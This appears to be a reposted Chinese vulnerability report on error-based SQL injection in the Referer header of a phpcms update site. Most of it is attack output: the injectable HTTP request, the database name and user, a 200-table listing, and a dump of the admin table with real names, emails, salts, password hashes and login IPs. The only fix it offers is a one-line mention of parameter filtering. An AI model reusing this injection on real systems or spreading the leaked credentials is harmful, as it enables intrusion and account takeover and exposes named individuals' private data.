phpcms某站点MySQL报错注入
phpcms某站点MySQL报错注入
Referer可注入:
GET /index.php HTTP/1.1 Referer: 123* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4 Cookie: PHPSESSID=qhncam3i8qper9cd21l275k017 Host: update.phpcms.cn Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */*
current user: 'phpcms_cn_user@%' current database: 'phpcms_cn' Database: phpcms_cn [200 tables] +--------------------------+ | v9_admin | | v9_admin_panel | | v9_admin_role | | v9_admin_role_priv | | v9_announce | | v9_app_log_day | | v9_app_log_total | | v9_appcenter | | v9_appcenter_data | | v9_apps | | v9_apps_content | | v9_attachment | | v9_attachment_index | | v9_badword | | v9_block | | v9_block_history | | v9_block_priv | | v9_buycar | | v9_cache | | v9_category | | v9_category_priv | | v9_check_email | | v9_collection_content | | v9_collection_history | | v9_collection_node | | v9_collection_program | | v9_comment | | v9_comment_check | | v9_comment_data_1 | | v9_comment_relation | | v9_comment_setting | | v9_comment_table | | v9_content_check | | v9_copyfrom | | v9_datacall | | v9_dbsource | | v9_developer | | v9_dianping | | v9_dianping_data | | v9_dianping_type | | v9_down | | v9_down_data | | v9_downservers | | v9_edu | | v9_edu_data | | v9_en_down | | v9_en_down_data | | v9_en_news | | v9_en_news_data | | v9_extend_setting | | v9_favorite | | v9_finance | | v9_friend | | v9_hits | | v9_info | | v9_info_data | | v9_ipbanned | | v9_kefu_online | | v9_kefu_process | | v9_key | | v9_keylink | | v9_keyword | | v9_keyword_data | | v9_license | | v9_license_logs | | v9_link | | v9_linkage | | v9_log | | v9_loveit | | v9_loveit_mylove | | v9_member | | v9_member_address | | v9_member_detail | | v9_member_en | | v9_member_group | | v9_member_menu | | v9_member_verify | | v9_member_vip | | v9_menu | | v9_message | | v9_message_data | | v9_message_group | | v9_miaosha | | v9_miaosha_data | | v9_model | | v9_model_field | | v9_module | | v9_mood | | v9_news | | v9_news_data | | v9_order | | v9_order_complaint | | v9_page | | v9_pai | | v9_pai_data | | v9_pay_account | | v9_pay_payment | | v9_pay_record | | v9_pay_spend | | v9_pl | | v9_pl_fee | | v9_plug | | v9_plug_data | | v9_plugin | | v9_plugin_var | | v9_position | | v9_position_data | | v9_poster | | v9_poster_201309 | | v9_poster_201310 | | v9_poster_201311 | | v9_poster_201403 | | v9_poster_201404 | | v9_poster_201405 | | v9_poster_201406 | | v9_poster_201407 | | v9_poster_201408 | | v9_poster_201409 | | v9_poster_201410 | | v9_poster_201411 | | v9_poster_201412 | | v9_poster_201501 | | v9_poster_201502 | | v9_poster_201503 | | v9_poster_201504 | | v9_poster_201505 | | v9_poster_201506 | | v9_poster_space | | v9_product | | v9_product_data | | v9_queue | | v9_release_point | | v9_score_vote | | v9_search | | v9_search_keyword | | v9_session | | v9_site | | v9_sms_address | | v9_sms_allowsend_ip | | v9_sms_app | | v9_sms_blacklist | | v9_sms_check_queue | | v9_sms_group | | v9_sms_md5 | | v9_sms_news | | v9_sms_news_data | | v9_sms_paylist | | v9_sms_product | | v9_sms_receive | | v9_sms_scene | | v9_sms_send_queue | | v9_sms_service_queue_gid | | v9_sms_service_report | | v9_sms_tk | | v9_sms_tpl | | v9_special | | v9_special_c_data | | v9_special_content | | v9_sphinx_counter | | v9_sso_admin | | v9_sso_applications | | v9_sso_members | | v9_sso_messagequeue | | v9_sso_session | | v9_sso_settings | | v9_task | | v9_task_quote | | v9_task_stage | | v9_template | | v9_template_bak | | v9_template_data | | v9_times | | v9_tuan | | v9_type | | v9_update_items | | v9_update_notice | | v9_update_referer | | v9_update_site | | v9_urlrule | | v9_video_1 | | v9_video_1_data | | v9_visitor | | v9_vote_data | | v9_vote_option | | v9_vote_subject | | v9_wap | | v9_wap_type | | v9_workflow | | v9_xzzd | | v9_xzzd_data | | v9_yp_certificate | | v9_yp_company | | v9_yp_design | | v9_yp_design_data | | v9_yp_guestbook | | v9_yp_plug | | v9_yp_plug_data | | v9_yp_relation | | v9_yp_template | | v9_yp_template_data | +--------------------------+
Database: phpcms_cn
Table: v9_admin
[3 entries]
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+
| roleid | userid | card | email
| encrypt | username | realname | password
| lastloginip | lastlogintime |
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+
| 1 | 1 | CQUHK1tTJ0NJVSArWxwDWCoBH3ItLCdLNlBQIFtYBwBfVnMC | wangdongw
[email protected] | z52Jxg | phpcms | | 710de87fff574e2123ec793e333c1b
ad | 114.251.167.194 | 1302248539 |
| 1 | 102 | | zhangming
[email protected] | VBqZUE | zhangmingxue | 张明雪 | 0664400c18b3fe8a28336493dc2
91372 | 10.228.132.12 | 1434703129 |
| 1 | 101 | | mayuhui@k
u6.com | dbtrn6 | mayuhui | 马玉辉 | 66685d46c2547db24c095798047
ef375 | 10.228.132.7 | 1434699380 |
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+
解决方案:
参数过滤
相关文章
图文推荐
- 文章
- 推荐
- 热门新闻